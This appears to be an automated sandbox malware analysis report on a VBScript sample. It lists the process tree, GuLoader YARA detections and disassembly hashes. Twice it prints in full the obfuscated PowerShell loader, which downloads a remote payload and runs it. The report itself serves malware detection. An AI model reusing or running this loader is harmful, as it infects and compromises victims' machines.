                                                      2024-05-23 16:25:01 UTC8175INData Raw: 63 95 2f e9 7a 33 f1 71 15 34 5c 8d 30 6b 61 f3 df bc 0e d8 e1 d0 35 5e c4 9e 9c 42 6d 70 0a b6 81 74 90 5f 6f 1c 82 17 4c a1 8e b8 09 bf ad 88 c3 8f 38 ef 75 02 55 1d 02 10 c4 c8 4e 73 75 19 2e 1a 30 73 98 86 07 9f b1 96 15 93 02 be 6f 4c 9b d0 44 8b 68 0f 23 36 9a 41 5b c3 59 e8 13 34 00 43 0e f7 b9 54 34 1a 83 67 27 03 b6 56 f1 04 34 fc cf 90 1c b9 76 71 05 2f 65 96 c4 e2 bc bc 2a 30 e7 b4 be 8e 90 01 46 bc 76 19 39 6b 75 29 d6 43 91 e6 f2 ce c7 fe 9c 33 97 e2 82 16 91 73 3b 3a 87 8d 18 da 44 3e 07 ca 53 83 ea 2c 3f 2e a5 13 c8 87 23 15 d8 f0 b4 61 8f ec 01 00 5b 88 05 76 80 e8 37 7a 27 dd 1f 95 be d1 40 3e 79 a8 b9 fc a7 3a 44 5e 48 70 98 f3 dc 7b 9d fd 59 1b 18 a6 22 a3 23 f9 ba c1 fc a8 7b c9 c9 e0 02 9a 96 c9 7b 46 05 e6 04 fb 8d 08 2b 1e 45 14 39
                                                      Data Ascii: c/z3q4\0ka5^Bmpt_oL8uUNsu.0soLDh#6A[Y4CT4g'V4vq/e*0Fv9ku)C3s;:D>S,?.#a[v7z'@>y:D^Hp{Y"#{{F+E9


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:12:23:55
                                                      Start date:23/05/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs"
                                                      Imagebase:0x7ff6699d0000
                                                      File size:170'496 bytes
                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:12:24:02
                                                      Start date:23/05/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr Spil. skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol (Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene 'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol (Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene 't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;"
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:12:24:02
                                                      Start date:23/05/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:12:24:04
                                                      Start date:23/05/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"
                                                      Imagebase:0x7ff60bdf0000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:12:24:12
                                                      Start date:23/05/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr Spil. skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol (Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene 'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol (Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene 't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;"
                                                      Imagebase:0xd0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2318228321.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2325090155.0000000008B80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2329721255.000000000CC2B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:12:24:14
                                                      Start date:23/05/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"
                                                      Imagebase:0x240000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:12:24:42
                                                      Start date:23/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                      Imagebase:0x220000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 00007FFD9B7EC856 Relevance: .5, Instructions: 472COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2702451958.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5fd1663f39fe31af0605a2660e5c240326d49b49b9bf061ac414943cce6d9042
                                                        • Instruction ID: 4410f827c2c7f2b4d67ab63bc72c4a432a1302da501c56238881d6f242c26a64
                                                        • Opcode Fuzzy Hash: 5fd1663f39fe31af0605a2660e5c240326d49b49b9bf061ac414943cce6d9042
                                                        • Instruction Fuzzy Hash: 96F19430A0DB8D8FEBA8DF28C8557E977E1FF54310F04426AD85DC72A5DB34A9458B82
                                                        Function 00007FFD9B7ED602 Relevance: .5, Instructions: 458COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2702451958.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7696951540694d736fa2d4a5974f5718ecbc0e688f5cb317aa4762bf9e3fd509
                                                        • Instruction ID: e96e10a7cc3f9a75a420647f75982c3e62c2f985f1f1dfea78db6eed7aadb733
                                                        • Opcode Fuzzy Hash: 7696951540694d736fa2d4a5974f5718ecbc0e688f5cb317aa4762bf9e3fd509
                                                        • Instruction Fuzzy Hash: 15E1B230A09A4E8FEBA8DF28C8657E977D1EF54310F04436ED85DC72A5DB78A9448B81
                                                        Function 00007FFD9B8B4D4E Relevance: .1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2703810508.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 548349516d5ef3c68c0a33a99cf6c8871b0a4a633b095a2cc9577c7b2a6e8737
                                                        • Instruction ID: 4d236bd0f8e571eb39f3dc15145da546302d6d0ef462cea18fbae37c04e829c9
                                                        • Opcode Fuzzy Hash: 548349516d5ef3c68c0a33a99cf6c8871b0a4a633b095a2cc9577c7b2a6e8737
                                                        • Instruction Fuzzy Hash: B5110A32F0EA9D4FF7A2DBA854A55B87BD1EF59310B1C00BFD44DC71A3DA2558018751
                                                        Function 00007FFD9B7E3945 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2702451958.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                        • Instruction ID: 9d0f349b20d3769d702d1b48706392534360580c57a97f4edb4389f87f1da052
                                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                        • Instruction Fuzzy Hash: A801447121CB0C4FD748EF0CE451AA5B7E0FB95364F10056EE58AC36A5D626E891CB45

                                                        Non-executed Functions

                                                        Function 00007FFD9B7E84F2 Relevance: 7.6, Strings: 6, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2702451958.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: K_^$K_^$K_^$K_^$K_^$K_^
                                                        • API String ID: 0-3805565700
                                                        • Opcode ID: 3c1d78cb3a0bab75989939032b8bb73e8b341623234552199d6aeb051c2e9062
                                                        • Instruction ID: 2fe1ea36f62f523c2402529b61470373fabaea9d90f0bddd2236adb851087f66
                                                        • Opcode Fuzzy Hash: 3c1d78cb3a0bab75989939032b8bb73e8b341623234552199d6aeb051c2e9062
